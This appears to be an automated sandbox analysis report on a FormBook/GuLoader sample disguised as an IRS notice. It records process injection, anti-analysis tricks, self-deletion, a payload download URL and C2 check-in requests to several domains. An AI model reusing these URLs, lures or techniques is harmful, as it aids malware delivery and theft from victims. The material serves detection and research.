Analysis Report: IRS Notice Letter pdf document.exe

Overview

General Information

Sample Name: IRS Notice Letter pdf document.exe
Analysis ID: 338078
MD5: 3fc4d64f320d7fae4bb46f6a735ab853
SHA1: b77666ebd649350f21ee41e0e902c9b95e008e3c
SHA256: ec8b3d104a7fc416aab07329a5f0ecab1b7fd181ffbd2d7ac31af51e532add07

Most interesting Screenshot:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • IRS Notice Letter pdf document.exe (PID: 6092 cmdline: 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe' MD5: 3FC4D64F320D7FAE4BB46F6A735AB853)
    • IRS Notice Letter pdf document.exe (PID: 3788 cmdline: 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe' MD5: 3FC4D64F320D7FAE4BB46F6A735AB853)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 2860 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 4972 cmdline: /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000003.00000002.1022334778.0000000005467000.00000004.00000001.sdmp
Rule: LokiBot_Dropper_Packed_R11_Feb18
Description: Auto-generated rule - file scan copy.pdf.r11
Author: Florian Roth
Strings:
  • 0x3a74:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: CMSTP Execution Process Creation
Source: Process started, Author: Nik Seetharaman, Data: Command: /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe', CommandLine: /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 2860, ProcessCommandLine: /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe', ProcessId: 4972

Signature Overview

AV Detection:

Yara detected FormBook
Source: Yara match, File source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: IRS Notice Letter pdf document.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cmstp.pdbGCTL source: IRS Notice Letter pdf document.exe, 00000001.00000003.750269972.000000000093F000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.730789316.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: IRS Notice Letter pdf document.exe, 00000001.00000002.755014575.000000001E210000.00000040.00000001.sdmp, cmstp.exe, 00000003.00000002.1021841767.0000000004F30000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: IRS Notice Letter pdf document.exe, cmstp.exe
Source: Binary string: cmstp.pdb source: IRS Notice Letter pdf document.exe, 00000001.00000003.750269972.000000000093F000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.730789316.0000000005A00000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 4x nop then pop esi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49735 -> 172.67.209.95:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49735 -> 172.67.209.95:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49735 -> 172.67.209.95:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49736 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49736 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49736 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 147.255.30.94:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 147.255.30.94:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 147.255.30.94:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49738 -> 153.126.209.136:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49738 -> 153.126.209.136:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49738 -> 153.126.209.136:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49739 -> 216.58.207.179:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49739 -> 216.58.207.179:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49739 -> 216.58.207.179:80
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.emuprising.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.myaarpdentalpln.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=kPRwpjmi7xHhdB/QktvvK7WyLyDr49juN0w/BSnfKghxj4qCtVdYSmPoUBccxdfkW2C+&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.alessandrabortolussi.net, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=29jYSSE1VYVkBCRV1XAvE7TBMmL4MadGzLcVh0Ks/tFMQ0j4Ha2R4yorJjHtPNwOuGsI&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.kobumsnetwork.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=GzMG1eSemGLMBHrXmbkE5oZCgXo7nbeyHhmTYulGjAFIODDsopduu5ndU/Um1KPjDO6l&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.rednbot.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=fd7Pr27tD73tirRUHLPhwKiuhRBsBtIJKGnPU16/EYze1BREDS5LbMsrasNXGEl7bB1Y&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.aksaystudios.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.aizimov.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=tK5SHJ/B9VkSEfSQE3soaE4uMhY2LrE6ZvvxVQcBFq9KYH6DfuOZHLVl1n1LVl7A3A7r&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.thebuzztraders.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.emuprising.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: Joe Sandbox View, IP Address: 199.59.242.153
Source: Joe Sandbox View, IP Address: 34.102.136.180
Source: Joe Sandbox View, ASN Name: BODIS-NJUS
Source: Joe Sandbox View, ASN Name: SAKURA-ASAKURAInternetIncJP
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: global traffic, HTTP traffic detected: GET /vc/xdark_GOaIsqF182.bin HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, Host: adojetson.com, Cache-Control: no-cache
Source: C:\Windows\explorer.exe, Code function: 2_2_04DBA302 getaddrinfo,setsockopt,recv,
Source: global traffic, HTTP traffic detected: GET /vc/xdark_GOaIsqF182.bin HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, Host: adojetson.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.emuprising.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.myaarpdentalpln.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=kPRwpjmi7xHhdB/QktvvK7WyLyDr49juN0w/BSnfKghxj4qCtVdYSmPoUBccxdfkW2C+&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.alessandrabortolussi.net, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=29jYSSE1VYVkBCRV1XAvE7TBMmL4MadGzLcVh0Ks/tFMQ0j4Ha2R4yorJjHtPNwOuGsI&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.kobumsnetwork.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=GzMG1eSemGLMBHrXmbkE5oZCgXo7nbeyHhmTYulGjAFIODDsopduu5ndU/Um1KPjDO6l&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.rednbot.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=fd7Pr27tD73tirRUHLPhwKiuhRBsBtIJKGnPU16/EYze1BREDS5LbMsrasNXGEl7bB1Y&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.aksaystudios.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.aizimov.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=tK5SHJ/B9VkSEfSQE3soaE4uMhY2LrE6ZvvxVQcBFq9KYH6DfuOZHLVl1n1LVl7A3A7r&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.thebuzztraders.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1, Host: www.emuprising.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: unknown, DNS traffic detected: queries for: adojetson.com
Source: IRS Notice Letter pdf document.exe, 00000001.00000002.751120614.0000000000562000.00000040.00000001.sdmp, String found in binary or memory: http://adojetson.com/vc/xdark_GOaIsqF182.bin
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000002.1022320807.0000000002B50000.00000002.00000001.sdmp, String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: cmstp.exe, 00000003.00000002.1022387283.00000000055E2000.00000004.00000001.sdmp, String found in binary or memory: https://cdn.jsdelivr.net/npm/popper.js
Source: cmstp.exe, 00000003.00000002.1022387283.00000000055E2000.00000004.00000001.sdmp, String found in binary or memory: https://code.jquery.com/jquery-3.5.1.slim.min.js
Source: cmstp.exe, 00000003.00000002.1022387283.00000000055E2000.00000004.00000001.sdmp, String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
Source: C:\Windows\explorer.exe, Code function: 2_2_04DB3EB2 OpenClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1022334778.0000000005467000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1021594863.000000000322D000.00000004.00000020.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: IRS Notice Letter pdf document.exe, Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample, Static PE information: Filename: IRS Notice Letter pdf document.exe
Source: initial sample, Static PE information: Filename: IRS Notice Letter pdf document.exe
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D34AF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D4BFA NtSetInformationThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D0840 EnumWindows,NtSetInformationThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D8FAC NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9209 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9235 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9229 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9226 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9254 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9241 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D926A NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9295 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D528E NtSetInformationThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9289 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D92BD NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D92B4 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D92A1 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D92DD NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D92D5 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D92C9 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D92F5 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D92E9 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D931D NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D2317 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9311 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9305 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9334 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9356 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9345 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D936E NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9398 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9381 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D93A9 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D93DD NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D93FD NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D93F4 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9019 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D5010 NtSetInformationThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9010 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9031 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9025 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9055 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D2057 NtSetInformationThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9049 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9040 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9075 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9069 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9061 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D909D NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9091 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9081 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D90BD NtResumeThread,
